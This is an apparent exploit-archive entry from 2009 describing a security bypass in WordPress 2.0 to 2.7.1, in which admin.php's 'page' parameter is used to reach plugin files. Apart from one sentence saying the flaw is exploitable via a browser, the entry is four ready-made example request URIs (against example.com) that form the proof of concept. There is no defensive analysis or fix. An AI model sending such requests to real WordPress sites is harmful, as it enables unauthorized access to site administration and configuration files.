[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : WordPress 2.0 - 2.7.1 admin.php Module Configuration Security Bypass Vulnerability
# Published : 2009-11-10
# Author : Fernando Arnaboldi
# Previous Title : CuteNews and UTF-8 CuteNews Multiple Security Vulnerabilities
# Next Title : phpBazar <= 2.1.1fix (cid) SQL Injection


An attacker can exploit this issue via a browser.

The following example URIs are available:

http://www.example.com/wp-admin/admin.php?page=/collapsing-archives/options.txt
http://www.example.com/wp-admin/admin.php?page=akismet/readme.txt
http://www.example.com/wp-admin/admin.php?page=related-ways-to-take-action/options.php
http://www.example.com/wp-admin/admin.php?page=wp-security-scan/securityscan.php